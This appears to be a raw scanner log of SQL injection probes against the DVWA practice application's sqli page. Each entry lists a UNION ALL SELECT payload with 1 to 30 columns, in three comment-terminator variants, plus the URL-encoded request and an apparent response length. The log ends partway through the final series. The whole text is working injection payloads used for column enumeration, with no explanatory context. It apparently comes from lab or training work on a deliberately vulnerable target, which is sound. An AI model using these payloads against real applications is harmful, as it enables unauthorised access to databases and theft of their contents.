 UNION ALL SELECT 'INJ'||'ECT'||'XXX'
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27&Submit=Submit
	176

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2&Submit=Submit
	178

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3&Submit=Submit
	180

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4&Submit=Submit
	182

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5&Submit=Submit
	184

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6&Submit=Submit
	186

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7&Submit=Submit
	188

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8&Submit=Submit
	190

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9&Submit=Submit
	192

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10&Submit=Submit
	195

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11&Submit=Submit
	198

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12&Submit=Submit
	201

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13&Submit=Submit
	204

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14&Submit=Submit
	207

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15&Submit=Submit
	210

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16&Submit=Submit
	213

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17&Submit=Submit
	216

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18&Submit=Submit
	219

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19&Submit=Submit
	222

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20&Submit=Submit
	225

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21&Submit=Submit
	228

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22&Submit=Submit
	231

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23&Submit=Submit
	234

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27--%20&Submit=Submit
	179

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2--%20&Submit=Submit
	181

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3--%20&Submit=Submit
	183

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4--%20&Submit=Submit
	185

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5--%20&Submit=Submit
	187

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6--%20&Submit=Submit
	189

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7--%20&Submit=Submit
	191

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8--%20&Submit=Submit
	193

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--%20&Submit=Submit
	195

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--%20&Submit=Submit
	198

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20&Submit=Submit
	201

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12--%20&Submit=Submit
	204

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13--%20&Submit=Submit
	207

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14--%20&Submit=Submit
	210

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15--%20&Submit=Submit
	213

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--%20&Submit=Submit
	216

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17--%20&Submit=Submit
	219

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18--%20&Submit=Submit
	222

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19--%20&Submit=Submit
	225

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20--%20&Submit=Submit
	228

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21--%20&Submit=Submit
	231

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22--%20&Submit=Submit
	234

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30--%20&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%23&Submit=Submit
	177

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%23&Submit=Submit
	179

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%23&Submit=Submit
	181

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%23&Submit=Submit
	183

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%23&Submit=Submit
	185

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%23&Submit=Submit
	187

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%23&Submit=Submit
	189

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%23&Submit=Submit
	191

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%23&Submit=Submit
	193

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23&Submit=Submit
	196

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23&Submit=Submit
	199

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23&Submit=Submit
	202

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23&Submit=Submit
	205

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
